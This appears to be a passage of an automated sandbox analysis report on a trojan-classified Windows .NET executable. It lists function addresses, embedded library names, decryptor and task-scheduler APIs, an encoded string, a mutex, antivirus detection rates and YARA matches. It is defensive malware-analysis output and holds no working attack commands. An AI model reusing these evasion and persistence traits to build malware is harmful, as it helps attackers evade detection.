                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_06C8E7580_2_06C8E758
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_06C700400_2_06C70040
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_06C700070_2_06C70007
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0040A9702_2_0040A970
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0040CAAA2_2_0040CAAA
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004086202_2_00408620
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0040B63E2_2_0040B63E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004220402_2_00422040
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004088502_2_00408850
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004368502_2_00436850
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004168562_2_00416856
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043C0602_2_0043C060
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004250702_2_00425070
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004220222_2_00422022
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043D0302_2_0043D030
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004370C22_2_004370C2
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004350C02_2_004350C0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004230D02_2_004230D0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041709A2_2_0041709A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043D8A02_2_0043D8A0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004039402_2_00403940
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041895F2_2_0041895F
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042A96A2_2_0042A96A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004059702_2_00405970
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004179712_2_00417971
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042A9722_2_0042A972
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042717D2_2_0042717D
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004091002_2_00409100
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004359302_2_00435930
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043C1302_2_0043C130
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0040D1C72_2_0040D1C7
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042B9CD2_2_0042B9CD
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004061D02_2_004061D0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042698C2_2_0042698C
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041F9902_2_0041F990
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004219A32_2_004219A3
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004249BC2_2_004249BC
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041BF2B2_2_0041BF2B
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004222502_2_00422250
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004342C32_2_004342C3
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004212C02_2_004212C0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004162D62_2_004162D6
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004142E02_2_004142E0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004042F02_2_004042F0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00417AFA2_2_00417AFA
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00434A932_2_00434A93
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043D2B02_2_0043D2B0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042BABA2_2_0042BABA
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004393402_2_00439340
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004113572_2_00411357
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042335E2_2_0042335E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041BB702_2_0041BB70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042BB032_2_0042BB03
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00438B002_2_00438B00
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042BB122_2_0042BB12
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004353202_2_00435320
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004233862_2_00423386
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00402BA02_2_00402BA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004074402_2_00407440
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00416C7C2_2_00416C7C
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00404C202_2_00404C20
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00421CCF2_2_00421CCF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00427CD42_2_00427CD4
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043C4902_2_0043C490
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00435CA02_2_00435CA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004095602_2_00409560
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00422D702_2_00422D70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BD102_2_0043BD10
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041E5202_2_0041E520
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004155382_2_00415538
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00425DC12_2_00425DC1
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041CDF02_2_0041CDF0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004205902_2_00420590
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043D5902_2_0043D590
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041D5A02_2_0041D5A0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00417DA02_2_00417DA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004066602_2_00406660
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00408E702_2_00408E70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BE002_2_0043BE00
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004196202_2_00419620
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042262A2_2_0042262A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00405E302_2_00405E30
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042A63F2_2_0042A63F
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042CECB2_2_0042CECB
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00420EE02_2_00420EE0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00411E902_2_00411E90
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042A69A2_2_0042A69A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0040AEB02_2_0040AEB0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00402F402_2_00402F40
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00438F602_2_00438F60
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041077E2_2_0041077E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004147132_2_00414713
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041BF2B2_2_0041BF2B
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042673E2_2_0042673E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004087802_2_00408780
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043B7812_2_0043B781
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004337982_2_00433798
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BFA02_2_0043BFA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: String function: 004142D0 appears 70 times
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: String function: 00407F20 appears 53 times
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1429651490.0000000005F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLcgkqdml.dll" vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1403828044.00000000016CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000000.1385787272.00000000010DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameldr.exe( vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLcgkqdml.dll" vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exeBinary or memory string: OriginalFilenameldr.exe( vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 3vLKNycnrz.exe, avl.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3vLKNycnrz.exe, atr.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 3vLKNycnrz.exe, auk.csBase64 encoded string: 'xGXeA0tmuU7IEUJu9GjEGEAl1m/eEkNp+2WWMEt/0nLZBVdK5G/IGkxn7ifKElpU0WnBG2Bq+nmWGF5U3nLIBltq+3XZDhVs8mjyO0tl8GjFTGlu40jUB0tN5XPAP09l83DITElu40PjFkNurFXDE0tz2HqWJUtq80/ZBUdl8CfsE0ow8HnZKH5k5HXZHkFlrHvIA3FI4m7fEkB/03PAFkdlrE/IA2pq432WRRk8oiSWNl148nHPG1dY8m7bElwwxHXAB0Ju1m/eEkNp+2XoD15n+G7IBRVp9n7IG1hmrG/AGEVu43neAw=='
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@1/1
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042CAFB CoCreateInstance,2_2_0042CAFB
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMutant created: \Sessions\1\BaseNamedObjects\Gaxvawd
                    Source: 3vLKNycnrz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 3vLKNycnrz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 3vLKNycnrz.exeReversingLabs: Detection: 52%
                    Source: 3vLKNycnrz.exeVirustotal: Detection: 56%
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeFile read: C:\Users\user\Desktop\3vLKNycnrz.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 3vLKNycnrz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 3vLKNycnrz.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: 3vLKNycnrz.exeStatic file information: File size 3635712 > 1048576
                    Source: 3vLKNycnrz.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x377000
                    Source: 3vLKNycnrz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 0.2.3vLKNycnrz.exe.6240000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3vLKNycnrz.exe.47d16e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3vLKNycnrz.exe.45cf2a0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1430982949.0000000006240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 3vLKNycnrz.exe PID: 7360, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_0329C478 pushad ; retf 0_2_0329C479
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_06C76DAE push ss; ret 0_2_06C76DAF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0044183C push cs; retf 2_2_0044184D
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00442A54 push eax; retn 0041h2_2_00442A55
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BCA0 push eax; mov dword ptr [esp], 1D1C1BCAh2_2_0043BCA2
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00441E88 push esi; ret 2_2_00441E89
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00438EB0 push eax; mov dword ptr [esp], 6A6B6C6Dh2_2_00438EBF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
